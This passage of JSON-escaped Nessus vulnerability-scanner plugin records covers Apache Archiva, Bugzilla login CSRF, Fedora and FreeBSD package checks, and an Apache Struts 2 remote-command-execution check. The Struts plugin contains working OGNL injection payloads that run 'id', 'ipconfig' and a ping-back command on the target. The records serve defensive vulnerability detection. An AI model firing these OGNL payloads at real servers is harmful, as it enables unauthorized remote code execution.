exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:8080, embedded:FALSE);\n\ninstall = get_install_from_kb(appname:'archiva', port:port, exit_on_fail:TRUE);\ndir = install['dir'];\ninstall_url = build_url(port:port, qs:dir+'/index.action');\nversion = install['ver'];\n\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, \"Apache Archiva\", install_url);\n\nif (version !~ \"^1\\.[23]($|\\.)\") audit(AUDIT_WEB_APP_NOT_INST, \"Apache Archiva 1.2.x / 1.3.x\", port);\n\n# Affected (per NVD) :\n# 1.2.x <= 1.2.2\n# 1.3.x <= 1.3.6\n# Fixed (per vendor) :\n# 1.3.8\n# 2.0.1\nif (\n version =~ \"^1\\.2($|[^0-9.])\" ||\n version =~ 
\"^1\\.2\\.[012]($|[^0-9])\" ||\n version =~ \"^1\\.3($|[^0-9.])\" ||\n version =~ \"^1\\.3\\.[0-6]($|[^0-9])\"\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 1.3.8 / 2.0.1' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Apache Archiva\", install_url, version);\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:18:26", "bulletinFamily": "scanner", "description": "According to its banner, the version of Bugzilla installed on the\nremote host is after version 2.0 but prior to 4.4.3 / 4.5.3. It is,\ntherefore, affected by a cross-site request forgery vulnerability.\n\nThe vulnerability exists with the login form and could allow a remote\nattacker to cause a user to login using the attacker's credentials,\nalerting the attacker of any bugs the user submits.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "modified": "2018-11-28T00:00:00", "published": "2014-05-20T00:00:00", "id": "BUGZILLA_LOGIN_XSRF.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=74107", "title": "Bugzilla 2.0 < 4.4.3 / 4.5.3 Login Form XSRF", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74107);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/28 22:47:41\");\n\n script_cve_id(\"CVE-2014-1517\");\n script_bugtraq_id(66984);\n\n script_name(english:\"Bugzilla 2.0 < 4.4.3 / 4.5.3 Login Form XSRF\");\n script_summary(english:\"Checks Bugzilla version number\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that suffers from 
a\ncross-site request forgery vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Bugzilla installed on the\nremote host is after version 2.0 but prior to 4.4.3 / 4.5.3. It is,\ntherefore, affected by a cross-site request forgery vulnerability.\n\nThe vulnerability exists with the login form and could allow a remote\nattacker to cause a user to login using the attacker's credentials,\nalerting the attacker of any bugs the user submits.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.bugzilla.org/security/4.0.11/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=713926\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Bugzilla 4.4.3 / 4.5.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/20\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:bugzilla\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"bugzilla_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"installed_sw/Bugzilla\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = 'Bugzilla';\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install[\"path\"];\nversion = install[\"version\"];\n\ninstall_loc = build_url(port:port, qs:dir + \"/query.cgi\");\n\nif (version =~ \"^4($|[^0-9.])\")\n audit(AUDIT_VER_NOT_GRANULAR, app, port, version);\n\n# Versions less than 4.4.3 / 4.5.3 are vulnerable\nif (\n version =~ \"^[23]\\.\" ||\n version =~ \"^4\\.[0-3]([^0-9]|$)\" ||\n version =~ \"^4\\.(4|4\\.[0-2])([^0-9.]|$)\" ||\n version =~ \"^4\\.(5|5\\.[12])([^0-9.]|$)\"\n)\n{\n set_kb_item(name:'www/'+port+'/XSRF', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_loc+\n '\\n Installed version : ' +version+\n '\\n Fixed version : 4.4.3 / 4.5.3\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_loc, version);\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-08T04:28:19", "bulletinFamily": "scanner", "description": "The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. 
Due to a flaw in the evaluation of an OGNL expression\nprefixed by the 'action:' parameter, a remote, unauthenticated\nattacker can exploit this issue to execute arbitrary commands on the\nremote web server. An attacker can exploit the issue by sending a\nspecially crafted HTTP request to the remote web server.\n\nNote that the 'redirect:' and 'redirectAction' parameters are also\nreportedly affected by the command execution vulnerability.\nAdditionally, this version of Struts 2 is also reportedly affected by\nan open redirect vulnerability; however, Nessus has not tested for\nthis additional issue.\n\nNote also that this plugin will only report the first vulnerable\ninstance of a Struts 2 application.\n\nFinally, note that Apache Archiva versions prior to and equal to\n1.3.6 are also affected by this issue as the application utilizes a\nvulnerable version of Struts 2.", "modified": "2019-02-07T00:00:00", "id": "STRUTS_2_3_15_1_COMMAND_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=68981", "published": "2013-07-19T00:00:00", "title": "Apache Struts 2 'action:' Parameter Arbitrary Remote Command Execution", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68981);\n script_version(\"1.27\");\n script_cvs_date(\"Date: 2019/02/07 12:14:48\");\n\n script_cve_id(\"CVE-2013-2251\");\n script_bugtraq_id(61189);\n\n script_name(english:\"Apache Struts 2 'action:' Parameter Arbitrary Remote Command Execution\");\n script_summary(english:\"Attempts to execute arbitrary commands.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server contains a web application that uses a Java\nframework, which is affected by a remote command execution\nvulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL 
(Object-Graph Navigation Language) as an expression\nlanguage. Due to a flaw in the evaluation of an OGNL expression\nprefixed by the 'action:' parameter, a remote, unauthenticated\nattacker can exploit this issue to execute arbitrary commands on the\nremote web server. An attacker can exploit the issue by sending a\nspecially crafted HTTP request to the remote web server.\n\nNote that the 'redirect:' and 'redirectAction' parameters are also\nreportedly affected by the command execution vulnerability.\nAdditionally, this version of Struts 2 is also reportedly affected by\nan open redirect vulnerability; however, Nessus has not tested for\nthis additional issue.\n\nNote also that this plugin will only report the first vulnerable\ninstance of a Struts 2 application.\n\nFinally, note that Apache Archiva versions prior to and equal to\n1.3.6 are also affected by this issue as the application utilizes a\nvulnerable version of Struts 2.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/527977/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://cxsecurity.com/issue/WLB-2014010087\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-016.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 2.3.15.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2251\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n 
script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"torture_cgi_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< 
os) cmd = 'ipconfig';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig');\n\nvuln = FALSE;\n\nforeach url (urls)\n{\n foreach cmd (cmds)\n {\n vuln_url = url + \"?action:%25{(new+java.lang.ProcessBuilder(new\" +\n \"+java.lang.String[]{'\" +cmd+ \"'})).start()}\";\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n fetch404 : TRUE,\n exit_on_fail : TRUE\n );\n\n if (\n res[0] =~ \"404 Not Found\" &&\n res[2] =~ \"\\<b\\>message\\</b\\> \\<u\\>(.*)/java\\.lang\\.\" +\n \"(UNIX)?Process(Impl)?@(.+)\\.jsp\\</u\\>\"\n )\n {\n vuln = TRUE;\n break;\n }\n }\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\n# Alternate attack that does not rely on 404 Error Page from Tomcat/JBoss\n# This attack uses the redirect: Parameter\nif (!vuln)\n{\n time = unixtime();\n foreach url (urls)\n {\n vuln_url = url +\"?redirect:${%23req%3d%23context.get('com.opensymphony\" +\n \".xwork2.dispatcher.HttpServletRequest'),%23webroot%3d%23req.get\" +\n \"Session().getServletContext().getRealPath('/'),%23resp%3d%23context.\" +\n \"get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').\" +\n \"getWriter(),%23resp.print('At%20\" +time+ \"%20Nessus%20found%20the\" +\n \"%20path%20is%20'),%23resp.println(%23webroot),%23resp.flush(),\" +\n \"%23resp.close()}\";\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n exit_on_fail : TRUE\n );\n\n if (\n (res[0] =~ \"200 OK\") &&\n (res[2] =~ '^At '+time+' Nessus found the path is ([a-zA-Z]:\\\\\\\\|/)(.*)')\n )\n {\n vuln = TRUE;\n break;\n }\n if (vuln) break;\n }\n}\n\n# try pingback.\nif(!vuln)\n{\n\n scanner_ip = this_host();\n target_ip = get_host_ip();\n\n ua = get_kb_item(\"global_settings/http_user_agent\");\n if (empty_or_null(ua))\n ua = 'Nessus';\n\n pat = hexstr(rand_str(length:10));\n\n if (!empty_or_null(os) && \"windows\" >< tolower(os))\n {\n ping_cmd = \"ping%20-n%203%20-l%20500%20\" + scanner_ip;\n 
filter = \"icmp and icmp[0] = 8 and src host \" + target_ip + \" and greater 500\";\n }\n else\n {\n ping_cmd = \"ping%20-c%203%20-p\" + pat + \"%20\" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip;\n }\n\n payload_ping = \"?redirect:$%7b%23context%5b%27xwork.MethodAccessor.denyMethodExecution\" +\n \"%27%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28\" +\n \"%27allowStaticMethodAccess%27%29%2c%23f.setAccessible%28true%29%2c%23f.set%28\" +\n \"%23_memberAccess%2ctrue%29%2c@org.apache.commons.io.IOUtils@toString%28\" +\n \"@java.lang.Runtime@getRuntime%28%29.exec%28%27\" + ping_cmd + \n \"%27%29.getInputStream%28%29%29%7d\";\n\n foreach url (urls)\n {\n soc = open_sock_tcp(port);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n attack_url = url + payload_ping;\n\n req =\n 'GET ' + attack_url + ' HTTP/1.1\\n' +\n 'Host: ' + target_ip + ':' + port + '\\n' +\n 'User-Agent: ' + ua + '\\n' +\n '\\n';\n\n s = send_capture(socket:soc,data:req,pcap_filter:filter);\n icmp = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n if (\"windows\" >< tolower(os) && !isnull(icmp))\n {\n vuln = TRUE;\n vuln_url = req;\n break;\n }\n else if (pat >< icmp)\n {\n vuln = TRUE;\n vuln_url = req;\n break;\n }\n }\n}\n\n# and finally, we try a simple injection of an ognl add.\nif(!vuln)\n{\n foreach url (urls)\n { \n payload_ognl_add = \"?redirect:%24%7B57550614%2b16044095%7D\";\n payload_redirect_verify_regex = \"Location: .*73594709\";\n \n attack_url = url + payload_ognl_add;\n\n res = http_send_recv3(\n method : \"GET\",\n item : attack_url,\n port : port,\n exit_on_fail : TRUE,\n follow_redirect: 0\n );\n\n if (res[1] =~ payload_redirect_verify_regex)\n {\n vuln = TRUE;\n vuln_url = attack_url;\n break;\n }\n\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n }\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port 
'+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(build_url(qs:vuln_url, port:port)),\n output : chomp(res[2])\n);\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:18:20", "bulletinFamily": "scanner", "description": "Previous versions of bugzilla had the following security issues :\n\n - The login form had no CSRF protection, meaning that an\n attacker could force the victim to log in using the\n attacker's credentials.\n\n - Dangerous control characters can be inserted into\n Bugzilla, notably into bug comments, which can then be\n used to execute local commands.\n\nThe first issue has the CVE number CVE-2014-1517. Please see\nhttp://www.bugzilla.org/security/4.0.11/ for all the gory details.\n\nBoth issues were fixed in 4.2.8 but it introduced a regression in bug\ncommenting that was fixed in 4.2.9.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2018-12-05T00:00:00", "published": "2014-04-30T00:00:00", "id": "FEDORA_2014-5433.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73778", "title": "Fedora 20 : bugzilla-4.2.9-1.fc20 (2014-5433)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-5433.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73778);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/12/05 20:31:22\");\n\n script_cve_id(\"CVE-2014-1517\");\n script_bugtraq_id(66984);\n script_xref(name:\"FEDORA\", value:\"2014-5433\");\n\n script_name(english:\"Fedora 20 : bugzilla-4.2.9-1.fc20 (2014-5433)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Previous versions of bugzilla had the following security issues :\n\n - The login form had no CSRF protection, meaning that an\n attacker could force the victim to log in using the\n attacker's credentials.\n\n - Dangerous control characters can be inserted into\n Bugzilla, notably into bug comments, which can then be\n used to execute local commands.\n\nThe first issue has the CVE number CVE-2014-1517. Please see\nhttp://www.bugzilla.org/security/4.0.11/ for all the gory details.\n\nBoth issues were fixed in 4.2.8 but it introduced a regression in bug\ncommenting that was fixed in 4.2.9.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.bugzilla.org/security/4.0.11/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.bugzilla.org/security/4.0.11/\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-April/132309.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b6e314a9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bugzilla package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bugzilla\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"bugzilla-4.2.9-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bugzilla\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-01-16T20:18:18", "bulletinFamily": "scanner", "description": "A Bugzilla Security Advisory reports : The login form had no CSRF\nprotection, meaning that an attacker could force the victim to log in\nusing the attacker's credentials. 
If the victim then reports a new\nsecurity sensitive bug, the attacker would get immediate access to\nthis bug.\n\nDue to changes involved in the Bugzilla API, this fix is not\nbackported to the 4.0 and 4.2 branches, meaning that Bugzilla 4.0.12\nand older, and 4.2.8 and older, will remain vulnerable to this issue.", "modified": "2018-11-10T00:00:00", "published": "2014-04-21T00:00:00", "id": "FREEBSD_PKG_608ED765C70011E3848C20CF30E32F6D.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73632", "title": "FreeBSD : bugzilla -- Cross-Site Request Forgery (608ed765-c700-11e3-848c-20cf30e32f6d)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73632);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/11/10 11:49:43\");\n\n script_cve_id(\"CVE-2014-1517\");\n\n script_name(english:\"FreeBSD : bugzilla -- Cross-Site Request Forgery (608ed765-c700-11e3-848c-20cf30e32f6d)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A Bugzilla Security Advisory reports : The login form had no CSRF\nprotection, meaning that an attacker could force the victim to log in\nusing the attacker's credentials. 
If the victim then reports a new\nsecurity sensitive bug, the attacker would get immediate access to\nthis bug.\n\nDue to changes involved in the Bugzilla API, this fix is not\nbackported to the 4.0 and 4.2 branches, meaning that Bugzilla 4.0.12\nand older, and 4.2.8 and older, will remain vulnerable to this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=713926\"\n );\n # https://vuxml.freebsd.org/freebsd/608ed765-c700-11e3-848c-20cf30e32f6d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ebfa9293\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bugzilla40\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bugzilla42\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bugzilla44\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"bugzilla40>=2.0.0<4.4.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bugzilla42>=2.0.0<4.4.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bugzilla44>=2.0.0<4.4.3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n 